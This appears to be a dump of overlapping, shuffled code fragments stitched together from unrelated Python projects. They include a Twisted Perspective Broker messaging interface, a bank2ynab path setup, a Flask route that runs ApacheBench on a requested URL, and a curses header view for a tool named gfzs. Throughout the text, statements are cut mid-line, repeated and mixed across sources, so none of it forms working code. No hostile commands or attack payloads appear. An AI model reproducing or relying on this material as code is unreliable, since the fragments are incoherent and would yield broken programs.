assert 'success' in result['result'] self.iface.registered = True", "factory.getRootObject() d.addCallbacks(connected, failed) else: d = 
connected(self.obj) return d def doCmd(self,cmd): def writeAck(result):", "= {'cmd':cmd} for key in kwargs: command[key] = kwargs[key] return self._comiface.doCmd(command) class _ComIFace(pb.Root):", "= iface self.port = self.iface.port self.obj = None def register(self): def regAck(result): assert", "self.port = self.iface.port self.obj = None def register(self): def regAck(result): assert 'success' in", "self.obj = None def register(self): def regAck(result): assert 'success' in result['result'] self.iface.registered =", "d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort,", "writeAck(result): return result def failed(reason): print reason reason.printTraceback() def connected(obj): self.obj = obj", "reason reason.printTraceback() def connected(obj): self.obj = obj # def closeAndReturn (result): # obj.broker.transport.loseConnection()", "reason def connected(obj): self.obj = obj regPacket = {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d =", "#d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d if self.obj is None: factory = pb.PBClientFactory()", "regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d if self.obj is None: factory", "failed) else: d = connected(self.obj) return d def unregister(self): def regAck(result): #assert 'success'", "connected(obj): self.obj = obj regPacket = {'cmd': 'unreg_app', 'name':self.iface.name,'port':self.iface.port} d = obj.callRemote('cmd', regPacket)", "return d def write(self, msg, dest): message = {'msg':msg,'dest':dest} return self._comiface.doWrite(message) def cmd(self,", "'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d if", "(result): 
#obj.broker.transport.loseConnection() return result d = obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed) return", "def doCmd(self,cmd): def writeAck(result): #print self.success(str(result)) return result def failed(reason): log.msg(self.failure (str(reason))) reason.printTraceback()", "= reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d = self._comiface.unregister() d.addCallback(lambda res: self._comiface.register()) return d def", "is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d = factory.getRootObject() d.addCallbacks(connected, failed)", "d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory = pb.PBClientFactory()", "{'cmd':cmd} for key in kwargs: command[key] = kwargs[key] return self._comiface.doCmd(command) class _ComIFace(pb.Root): def", "class ComIFace (object): def __init__(self, name, port): self.readCB = None self._comiface = None", "return result def failed(reason): print reason reason.printTraceback() def connected(obj): self.obj = obj #", "else: d = connected(self.obj) return d def doCmd(self,cmd): def writeAck(result): #print self.success(str(result)) return", "in kwargs: command[key] = kwargs[key] return self._comiface.doCmd(command) class _ComIFace(pb.Root): def __init__(self, iface): self.iface", "res: self._comiface.register()) return d def stop(self): d = self._comiface.unregister() port, self.tcpPort = self.tcpPort,", "kwargs: command[key] = kwargs[key] return self._comiface.doCmd(command) class _ComIFace(pb.Root): def __init__(self, iface): self.iface =", "print reason def connected(obj): self.obj = obj regPacket = {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d", "kwargs[key] return self._comiface.doCmd(command) class _ComIFace(pb.Root): def __init__(self, iface): self.iface = iface self.port =", "obj.callRemote('cmd', cmd) 
d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed) return d if self.obj is None: factory", "(result): # obj.broker.transport.loseConnection() # return result d = obj.callRemote('write', msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn,", "None def register(self): def regAck(result): assert 'success' in result['result'] self.iface.registered = True def", "key in kwargs: command[key] = kwargs[key] return self._comiface.doCmd(command) class _ComIFace(pb.Root): def __init__(self, iface):", "None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d = factory.getRootObject() d.addCallbacks(connected, failed) else:", "(str(reason))) reason.printTraceback() def connected(obj): self.obj = obj def closeAndReturn (result): #obj.broker.transport.loseConnection() return result", "connected(self.obj) return d def doCmd(self,cmd): def writeAck(result): #print self.success(str(result)) return result def failed(reason):", "message = {'msg':msg,'dest':dest} return self._comiface.doWrite(message) def cmd(self, cmd, **kwargs): command = {'cmd':cmd} for", "# def closeAndReturn (result): # obj.broker.transport.loseConnection() # return result d = obj.callRemote('write', msg)", "# obj.broker.transport.loseConnection() # return result d = obj.callRemote('write', msg) d.addCallbacks(writeAck, failed) #d.addCallbacks(closeAndReturn, failed)", "interface='127.0.0.1') d = self._comiface.unregister() d.addCallback(lambda res: self._comiface.register()) return d def stop(self): d =", "port.stopListening()) return d def write(self, msg, dest): message = {'msg':msg,'dest':dest} return self._comiface.doWrite(message) def", "in result['result'] self.iface.registered = False def failed(reason): print reason def connected(obj): self.obj =", "log.msg(self.failure (str(reason))) reason.printTraceback() def connected(obj): self.obj = obj def closeAndReturn (result): #obj.broker.transport.loseConnection() return", 
"factory.getRootObject() d.addCallbacks(connected, failed) else: d = connected(self.obj) return d def remote_read(self, message): self.iface.readCB(message)", "def doWrite(self, msg): def writeAck(result): return result def failed(reason): print reason reason.printTraceback() def", "False def failed(reason): print reason def connected(obj): self.obj = obj regPacket = {'cmd':", "= True def failed(reason): print reason def connected(obj): self.obj = obj regPacket =", "= obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(), failed) return d if self.obj is", "= pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d = factory.getRootObject() d.addCallbacks(connected, failed) else: d =", "failed) else: d = connected(self.obj) return d def doCmd(self,cmd): def writeAck(result): #print self.success(str(result))", "reason.printTraceback() def connected(obj): self.obj = obj def closeAndReturn (result): #obj.broker.transport.loseConnection() return result d", "connected(obj): self.obj = obj def closeAndReturn (result): #obj.broker.transport.loseConnection() return result d = obj.callRemote('cmd',", "from twisted.spread import pb from twisted.internet import reactor from comlocal.core.Com import Com class", "failed) else: d = connected(self.obj) return d def doWrite(self, msg): def writeAck(result): return", "self.tcpPort = reactor.listenTCP(self.port, pb.PBServerFactory(self._comiface), interface='127.0.0.1') d = self._comiface.unregister() d.addCallback(lambda res: self._comiface.register()) return d", "assert 'success' in result['result'] self.iface.registered = True def failed(reason): print reason def connected(obj):", "command[key] = kwargs[key] return self._comiface.doCmd(command) class _ComIFace(pb.Root): def __init__(self, iface): self.iface = iface", "def writeAck(result): #print self.success(str(result)) return result def failed(reason): log.msg(self.failure 
(str(reason))) reason.printTraceback() def connected(obj):", "connected(self.obj) return d def doWrite(self, msg): def writeAck(result): return result def failed(reason): print", "regPacket = {'cmd': 'reg_app', 'name':self.iface.name,'port':self.port} d = obj.callRemote('cmd', regPacket) d.addCallbacks(regAck,failed) #d.addCallbacks(lambda result: obj.broker.transport.loseConnection(),", "return d if self.obj is None: factory = pb.PBClientFactory() reactor.connectTCP(\"127.0.0.1\", Com.myPort, factory) d", "pb from twisted.internet import reactor from comlocal.core.Com import Com class ComIFace (object): def", "d = self._comiface.unregister() port, self.tcpPort = self.tcpPort, None d.addCallback(lambda res: port.stopListening()) return d", "= obj.callRemote('cmd', cmd) d.addCallbacks(writeAck, failed) d.addCallbacks(closeAndReturn, failed) return d if self.obj is None:", "self.iface.port self.obj = None def register(self): def regAck(result): assert 'success' in result['result'] self.iface.registered", "closeAndReturn (result): # obj.broker.transport.loseConnection() # return result d = obj.callRemote('write', msg) d.addCallbacks(writeAck, failed)", "def writeAck(result): return result def failed(reason): print reason reason.printTraceback() def connected(obj): self.obj =" ]
[ "dirname, join, realpath project_dirname = dirname(dirname(realpath(__file__))) path = join(project_dirname, \"bank2ynab\") if path not", "from os.path import dirname, join, realpath project_dirname = dirname(dirname(realpath(__file__))) path = join(project_dirname, \"bank2ynab\")", "import sys from os.path import dirname, join, realpath project_dirname = dirname(dirname(realpath(__file__))) path =", "join, realpath project_dirname = dirname(dirname(realpath(__file__))) path = join(project_dirname, \"bank2ynab\") if path not in", "os.path import dirname, join, realpath project_dirname = dirname(dirname(realpath(__file__))) path = join(project_dirname, \"bank2ynab\") if", "import dirname, join, realpath project_dirname = dirname(dirname(realpath(__file__))) path = join(project_dirname, \"bank2ynab\") if path", "<reponame>Pezmc/bank2ynab<gh_stars>10-100 import sys from os.path import dirname, join, realpath project_dirname = dirname(dirname(realpath(__file__))) path", "project_dirname = dirname(dirname(realpath(__file__))) path = join(project_dirname, \"bank2ynab\") if path not in sys.path: sys.path.append(path)", "realpath project_dirname = dirname(dirname(realpath(__file__))) path = join(project_dirname, \"bank2ynab\") if path not in sys.path:", "sys from os.path import dirname, join, realpath project_dirname = dirname(dirname(realpath(__file__))) path = join(project_dirname," ]
[ "current_app, Blueprint, render_template, redirect, url_for, request from flaskapp.logic.ab import runab views = Blueprint('views',", "c, \"-n\", n, url] print(args) result = runab(args) # return render_template(\"ab.html\") return result", "n = \"20\" c = \"5\" if request.json: print(request.json) c = str(request.json['c']) n", "str(request.json['n']) url = str(request.json['url']) args = [\"ab\", \"-c\", c, \"-n\", n, url] print(args)", "runab views = Blueprint('views', __name__) @views.route('/') def home(): return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"])", "from flaskapp.logic.ab import runab views = Blueprint('views', __name__) @views.route('/') def home(): return render_template(\"base.html\")", "def home(): return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"]) def ab_get(): url = \"http://www.github.com/\" n", "= \"20\" c = \"5\" if request.json: print(request.json) c = str(request.json['c']) n =", "def ab_get(): url = \"http://www.github.com/\" n = \"20\" c = \"5\" if request.json:", "Blueprint, render_template, redirect, url_for, request from flaskapp.logic.ab import runab views = Blueprint('views', __name__)", "from flask import current_app, Blueprint, render_template, redirect, url_for, request from flaskapp.logic.ab import runab", "methods=[\"GET\", \"POST\"]) def ab_get(): url = \"http://www.github.com/\" n = \"20\" c = \"5\"", "\"http://www.github.com/\" n = \"20\" c = \"5\" if request.json: print(request.json) c = str(request.json['c'])", "if request.json: print(request.json) c = str(request.json['c']) n = str(request.json['n']) url = str(request.json['url']) args", "= str(request.json['url']) args = [\"ab\", \"-c\", c, \"-n\", n, url] print(args) result =", "= Blueprint('views', __name__) @views.route('/') def home(): return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"]) def ab_get():", "= [\"ab\", \"-c\", c, \"-n\", n, url] print(args) result 
= runab(args) # return", "str(request.json['c']) n = str(request.json['n']) url = str(request.json['url']) args = [\"ab\", \"-c\", c, \"-n\",", "\"5\" if request.json: print(request.json) c = str(request.json['c']) n = str(request.json['n']) url = str(request.json['url'])", "url = str(request.json['url']) args = [\"ab\", \"-c\", c, \"-n\", n, url] print(args) result", "= str(request.json['n']) url = str(request.json['url']) args = [\"ab\", \"-c\", c, \"-n\", n, url]", "[\"ab\", \"-c\", c, \"-n\", n, url] print(args) result = runab(args) # return render_template(\"ab.html\")", "\"-c\", c, \"-n\", n, url] print(args) result = runab(args) # return render_template(\"ab.html\") return", "__name__) @views.route('/') def home(): return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"]) def ab_get(): url =", "c = \"5\" if request.json: print(request.json) c = str(request.json['c']) n = str(request.json['n']) url", "<gh_stars>0 from flask import current_app, Blueprint, render_template, redirect, url_for, request from flaskapp.logic.ab import", "url_for, request from flaskapp.logic.ab import runab views = Blueprint('views', __name__) @views.route('/') def home():", "print(request.json) c = str(request.json['c']) n = str(request.json['n']) url = str(request.json['url']) args = [\"ab\",", "= str(request.json['c']) n = str(request.json['n']) url = str(request.json['url']) args = [\"ab\", \"-c\", c,", "views = Blueprint('views', __name__) @views.route('/') def home(): return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"]) def", "home(): return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"]) def ab_get(): url = \"http://www.github.com/\" n =", "str(request.json['url']) args = [\"ab\", \"-c\", c, \"-n\", n, url] print(args) result = runab(args)", "\"POST\"]) def ab_get(): url = \"http://www.github.com/\" n = \"20\" c = \"5\" if", "import current_app, Blueprint, render_template, redirect, 
url_for, request from flaskapp.logic.ab import runab views =", "redirect, url_for, request from flaskapp.logic.ab import runab views = Blueprint('views', __name__) @views.route('/') def", "@views.route('/') def home(): return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"]) def ab_get(): url = \"http://www.github.com/\"", "request from flaskapp.logic.ab import runab views = Blueprint('views', __name__) @views.route('/') def home(): return", "ab_get(): url = \"http://www.github.com/\" n = \"20\" c = \"5\" if request.json: print(request.json)", "render_template, redirect, url_for, request from flaskapp.logic.ab import runab views = Blueprint('views', __name__) @views.route('/')", "Blueprint('views', __name__) @views.route('/') def home(): return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"]) def ab_get(): url", "= \"5\" if request.json: print(request.json) c = str(request.json['c']) n = str(request.json['n']) url =", "flask import current_app, Blueprint, render_template, redirect, url_for, request from flaskapp.logic.ab import runab views", "import runab views = Blueprint('views', __name__) @views.route('/') def home(): return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\",", "= \"http://www.github.com/\" n = \"20\" c = \"5\" if request.json: print(request.json) c =", "\"20\" c = \"5\" if request.json: print(request.json) c = str(request.json['c']) n = str(request.json['n'])", "request.json: print(request.json) c = str(request.json['c']) n = str(request.json['n']) url = str(request.json['url']) args =", "c = str(request.json['c']) n = str(request.json['n']) url = str(request.json['url']) args = [\"ab\", \"-c\",", "return render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"]) def ab_get(): url = \"http://www.github.com/\" n = \"20\"", "render_template(\"base.html\") @views.route('/ab', methods=[\"GET\", \"POST\"]) def ab_get(): url = \"http://www.github.com/\" 
n = \"20\" c", "n = str(request.json['n']) url = str(request.json['url']) args = [\"ab\", \"-c\", c, \"-n\", n,", "args = [\"ab\", \"-c\", c, \"-n\", n, url] print(args) result = runab(args) #", "url = \"http://www.github.com/\" n = \"20\" c = \"5\" if request.json: print(request.json) c", "@views.route('/ab', methods=[\"GET\", \"POST\"]) def ab_get(): url = \"http://www.github.com/\" n = \"20\" c =", "flaskapp.logic.ab import runab views = Blueprint('views', __name__) @views.route('/') def home(): return render_template(\"base.html\") @views.route('/ab'," ]
[ "= False self.window.addstr(0, i, c, self.color.google(\"o\")) else: self.window.addstr(0, i, c, self.color.google(\"o2\")) else: self.window.addstr(0,", "Disable the mouse cursor. curses.curs_set(0) target = TestHeader(stdscr) error = None try: target.run()", "TestHeader(stdscr) error = None try: target.run() except curses.error as e: error = str(e)", "import Base import gfzs.utils.logger as logger if os.environ.get(\"DEBUG\"): import gfzs.utils.debug as debug #", "when 「python3 gfzs/controller.py」 except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from views.base import", "# https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import utils.logger as logger from base import Base", "__name__ == \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import utils.logger as logger from", "start_index += len(FUZZY) + 1 self.window.addstr(0, start_index, SEARCH, self.color.search()) # Write verion start_index", "curses.initscr() color.init() # turn off automatic echoing of keys to the screen curses.noecho()", "as logger if os.environ.get(\"DEBUG\"): import utils.debug as debug class Header(Base): def __init__(self, stdscr):", "「python3 gfzs/views/header.py」 if __name__ == \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) import info import utils.logger", "0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\" % progname) def handle_sigint(signum, frame): logger.debug(\"detect SIGINT", "logger from base import Base if os.environ.get(\"DEBUG\"): import utils.debug as debug # need", "+= len(FUZZY) + 1 self.window.addstr(0, 
start_index, SEARCH, self.color.search()) # Write verion start_index +=", "curses.endwin() def _loop(self): self.create() while True: try: user_input = self.window.getch() except curses.error: continue", "= \"Google\" FUZZY = \"Fuzzy\" SEARCH = \"Search\" try: # need when 「python3", "logger.debug(\"init curses\") stdscr = curses.initscr() color.init() # turn off automatic echoing of keys", "class Header(Base): def __init__(self, stdscr): super().__init__(stdscr, None, \"header\") self.version = \"(%s)\" % info.__version__", "# Disable the mouse cursor. curses.curs_set(0) target = TestHeader(stdscr) error = None try:", "__name__ == \"__main__\": import signal # local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import", "sys.exit(1) # initscr() returns a window object representing the entire screen. logger.debug(\"init curses\")", "mouse cursor. curses.curs_set(0) target = TestHeader(stdscr) error = None try: target.run() except curses.error", "https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable the mouse cursor. curses.curs_set(0) target = TestHeader(stdscr) error =", "\"__main__\": class TestHeader(Header): def run(self): self._loop() def _end_curses(self): \"\"\" Terminates the curses application.", "error) logger.debug(\"exit 1\") sys.exit(1) # initscr() returns a window object representing the entire", "class TestHeader(Header): def run(self): self._loop() def _end_curses(self): \"\"\" Terminates the curses application. 
\"\"\"", "except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from views.base import Base import utils.logger", "invalid.\") for error in runtime_config.errors: logger.error(error) print(\"Error: %s\" % error) logger.debug(\"exit 1\") sys.exit(1)", "import info from views.base import Base import utils.logger as logger if os.environ.get(\"DEBUG\"): import", "try: # need when 「python3 gfzs/views/header.py」 if __name__ == \"__main__\": # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))", "# need when 「python3 gfzs/controller.py」 except ModuleNotFoundError: # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from", "True: try: user_input = self.window.getch() except curses.error: continue except KeyboardInterrupt: break if user_input", "is invalid.\") for error in runtime_config.errors: logger.error(error) print(\"Error: %s\" % error) logger.debug(\"exit 1\")", "self.reset() if __name__ == \"__main__\": import signal # local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from", "= curses.newwin(2, self.parent_width, 0, 0) # https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index = 0 #", "from gfzs import info from gfzs.views.base import Base import gfzs.utils.logger as logger if", "+= len(GOOGLE) + 1 self.window.addstr(0, start_index, FUZZY, self.color.fuzzy()) # Write Search start_index +=", "- len(self.copyright), self.copyright, self.color.copy_right(), ) self.window.hline( 1, 0, curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width )", "try: target.run() except curses.error as e: error = str(e) finally: target._end_curses() if error", "import utils.debug as 
debug class Header(Base): def __init__(self, stdscr): super().__init__(stdscr, None, \"header\") self.version", "from gfzs.views.base import Base import gfzs.utils.logger as logger if os.environ.get(\"DEBUG\"): import gfzs.utils.debug as", "Terminates the curses application. \"\"\" logger.debug(\"[TestHeader] end curses\") curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin() def", "reset(self): logger.debug(\"[Header] reset\") self.window.erase() self._init_layout() self._make_header() self.window.refresh() def _init_layout(self): self.parent_height, self.parent_width = self.stdscr.getmaxyx()", "\"__main__\": import signal # local # https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from model import Model import", "gfzs.utils.logger as logger if os.environ.get(\"DEBUG\"): import gfzs.utils.debug as debug # need when 「python3", "sys.exit(0) signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if not runtime_config.valid(): logger.debug(\"[print] 'Config is invalid.'\") print(\"Config is", "c = google[i] if c == \"o\": if first_o: first_o = False self.window.addstr(0,", "for error in runtime_config.errors: logger.error(error) print(\"Error: %s\" % error) logger.debug(\"exit 1\") sys.exit(1) #", "as logger if os.environ.get(\"DEBUG\"): import gfzs.utils.debug as debug # need when 「python3 gfzs/controller.py」", "i, c, self.color.google(c)) # Write Fuzzy start_index += len(GOOGLE) + 1 self.window.addstr(0, start_index,", "self._loop() def _end_curses(self): \"\"\" Terminates the curses application. 
\"\"\" logger.debug(\"[TestHeader] end curses\") curses.nocbreak()", "\"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\" % progname) def handle_sigint(signum, frame): logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit", "def _make_header(self): start_index = 0 # Write Google google = list(GOOGLE) first_o =", "SEARCH, self.color.search()) # Write verion start_index += len(SEARCH) + 1 self.window.addstr(0, start_index, self.version,", "start_index, FUZZY, self.color.fuzzy()) # Write Search start_index += len(FUZZY) + 1 self.window.addstr(0, start_index,", "self.window.addstr(0, i, c, self.color.google(\"o\")) else: self.window.addstr(0, i, c, self.color.google(\"o2\")) else: self.window.addstr(0, i, c,", "_end_curses(self): \"\"\" Terminates the curses application. \"\"\" logger.debug(\"[TestHeader] end curses\") curses.nocbreak() self.window.keypad(0) curses.echo()", "logger if os.environ.get(\"DEBUG\"): import utils.debug as debug class Header(Base): def __init__(self, stdscr): super().__init__(stdscr,", "target = TestHeader(stdscr) error = None try: target.run() except curses.error as e: error", "os.environ.get(\"DEBUG\"): import utils.debug as debug # need when 「cat fixtures/rust.json | python -m", "i, c, self.color.google(\"o\")) else: self.window.addstr(0, i, c, self.color.google(\"o2\")) else: self.window.addstr(0, i, c, self.color.google(c))", "# https://codechacha.com/ja/how-to-import-python-files/ sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(\"../\")))) import info from views.base import Base import utils.logger as logger", "logger.debug(\"[Header] reset\") self.window.erase() self._init_layout() self._make_header() self.window.refresh() def _init_layout(self): self.parent_height, self.parent_width = self.stdscr.getmaxyx() self.window", "{\"progname\": progname, \"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\" % progname) def 
handle_sigint(signum,", "frame): logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if not runtime_config.valid():", "runtime_config.errors: logger.error(error) print(\"Error: %s\" % error) logger.debug(\"exit 1\") sys.exit(1) # initscr() returns a", "Base if os.environ.get(\"DEBUG\"): import utils.debug as debug # need when 「cat fixtures/rust.json |", "+ 1 self.window.addstr(0, start_index, FUZZY, self.color.fuzzy()) # Write Search start_index += len(FUZZY) +", "\"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\" % progname) def handle_sigint(signum, frame): logger.debug(\"detect SIGINT (Ctrl-c)\")", "logger.debug(\"exit 0\") sys.exit(0) signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if not runtime_config.valid(): logger.debug(\"[print] 'Config is invalid.'\")", "self.parent_height, self.parent_width = self.stdscr.getmaxyx() self.window = curses.newwin(2, self.parent_width, 0, 0) # https://stackoverflow.com/a/53016371/9434894 def", "self.parent_width, 0, 0) # https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index = 0 # Write Google", "Write Copyright self.window.addstr( 0, self.parent_width - len(self.copyright), self.copyright, self.color.copy_right(), ) self.window.hline( 1, 0,", "\"header\") self.version = \"(%s)\" % info.__version__ self.copyright = info.__copyright__ def create(self): logger.debug(\"[Header] create\")", "0, curses.ACS_HLINE | self.colors[\"hline\"], self.parent_width ) if __name__ == \"__main__\": class TestHeader(Header): def", "0, 0) # https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index = 0 # Write Google google", "end curses\") curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin() def _loop(self): self.create() while True: try: user_input", "(Ctrl-c)\") logger.debug(\"exit 0\") sys.exit(0) 
signal.signal(signal.SIGINT, handle_sigint) runtime_config.init() if not runtime_config.valid(): logger.debug(\"[print] 'Config is", "off automatic echoing of keys to the screen curses.noecho() # Buffering off #", "import utils.debug as debug # need when 「cat fixtures/rust.json | python -m gfzs」", "Google google = list(GOOGLE) first_o = True for i in range(len(google)): c =", "str(e) finally: target._end_curses() if error != None: logger.error(error) print(error) logger.debug(\"end %s\" % progname,", "runtime_config import utils.color as color progname = \"gfzs.views.header\" properties = {\"progname\": progname, \"severity\":", "# https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() # Disable the mouse cursor. curses.curs_set(0) target = TestHeader(stdscr) error", "screen. logger.debug(\"init curses\") stdscr = curses.initscr() color.init() # turn off automatic echoing of", "logger.debug(\"[TestHeader] end curses\") curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin() def _loop(self): self.create() while True: try:", "1 self.window.addstr(0, start_index, FUZZY, self.color.fuzzy()) # Write Search start_index += len(FUZZY) + 1", "automatic echoing of keys to the screen curses.noecho() # Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak", "of keys to the screen curses.noecho() # Buffering off # https://docs.python.org/ja/3/library/curses.html#curses.cbreak curses.cbreak() #", "import utils.color as color progname = \"gfzs.views.header\" properties = {\"progname\": progname, \"severity\": 0,", "import Model import runtime.config as runtime_config import utils.color as color progname = \"gfzs.views.header\"", "start_index += len(SEARCH) + 1 self.window.addstr(0, start_index, self.version, self.color.version()) # Write Copyright self.window.addstr(", "as e: error = str(e) finally: target._end_curses() if error != None: logger.error(error) print(error)", "0\") sys.exit(0) signal.signal(signal.SIGINT, 
handle_sigint) runtime_config.init() if not runtime_config.valid(): logger.debug(\"[print] 'Config is invalid.'\") print(\"Config", "the entire screen. logger.debug(\"init curses\") stdscr = curses.initscr() color.init() # turn off automatic", "Write Fuzzy start_index += len(GOOGLE) + 1 self.window.addstr(0, start_index, FUZZY, self.color.fuzzy()) # Write", "logger.init_properties(**properties) logger.debug(\"start %s\" % progname) def handle_sigint(signum, frame): logger.debug(\"detect SIGINT (Ctrl-c)\") logger.debug(\"exit 0\")", "curses.echo() curses.endwin() def _loop(self): self.create() while True: try: user_input = self.window.getch() except curses.error:", "e: error = str(e) finally: target._end_curses() if error != None: logger.error(error) print(error) logger.debug(\"end", "# Write Copyright self.window.addstr( 0, self.parent_width - len(self.copyright), self.copyright, self.color.copy_right(), ) self.window.hline( 1,", "finally: target._end_curses() if error != None: logger.error(error) print(error) logger.debug(\"end %s\" % progname, new_line=True)", "0, self.parent_width - len(self.copyright), self.copyright, self.color.copy_right(), ) self.window.hline( 1, 0, curses.ACS_HLINE | self.colors[\"hline\"],", "if first_o: first_o = False self.window.addstr(0, i, c, self.color.google(\"o\")) else: self.window.addstr(0, i, c,", "\"gfzs.views.header\" properties = {\"progname\": progname, \"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\" %", "first_o = True for i in range(len(google)): c = google[i] if c ==", "utils.debug as debug # need when 「cat fixtures/rust.json | python -m gfzs」 #", "run(self): self._loop() def _end_curses(self): \"\"\" Terminates the curses application. 
\"\"\" logger.debug(\"[TestHeader] end curses\")", "as debug class Header(Base): def __init__(self, stdscr): super().__init__(stdscr, None, \"header\") self.version = \"(%s)\"", "__name__ == \"__main__\": class TestHeader(Header): def run(self): self._loop() def _end_curses(self): \"\"\" Terminates the", "self.version = \"(%s)\" % info.__version__ self.copyright = info.__copyright__ def create(self): logger.debug(\"[Header] create\") self._init_layout()", "def create(self): logger.debug(\"[Header] create\") self._init_layout() self._make_header() self.window.refresh() def reset(self): logger.debug(\"[Header] reset\") self.window.erase() self._init_layout()", "except KeyboardInterrupt: break if user_input == curses.KEY_RESIZE: self.reset() if __name__ == \"__main__\": import", "a window object representing the entire screen. logger.debug(\"init curses\") stdscr = curses.initscr() color.init()", "https://stackoverflow.com/a/53016371/9434894 def _make_header(self): start_index = 0 # Write Google google = list(GOOGLE) first_o", "application. 
\"\"\" logger.debug(\"[TestHeader] end curses\") curses.nocbreak() self.window.keypad(0) curses.echo() curses.endwin() def _loop(self): self.create() while", "<gh_stars>0 import curses import os, sys GOOGLE = \"Google\" FUZZY = \"Fuzzy\" SEARCH", "1 self.window.addstr(0, start_index, SEARCH, self.color.search()) # Write verion start_index += len(SEARCH) + 1", "bin/gfzs」 else: from gfzs import info from gfzs.views.base import Base import gfzs.utils.logger as", "= \"Search\" try: # need when 「python3 gfzs/views/header.py」 if __name__ == \"__main__\": #", "info.__copyright__ def create(self): logger.debug(\"[Header] create\") self._init_layout() self._make_header() self.window.refresh() def reset(self): logger.debug(\"[Header] reset\") self.window.erase()", "if user_input == curses.KEY_RESIZE: self.reset() if __name__ == \"__main__\": import signal # local", "import gfzs.utils.logger as logger if os.environ.get(\"DEBUG\"): import gfzs.utils.debug as debug # need when", "\"severity\": 0, \"log_path\": \"./tmp/gfzs.log\"} logger.init_properties(**properties) logger.debug(\"start %s\" % progname) def handle_sigint(signum, frame): logger.debug(\"detect", "window object representing the entire screen. 
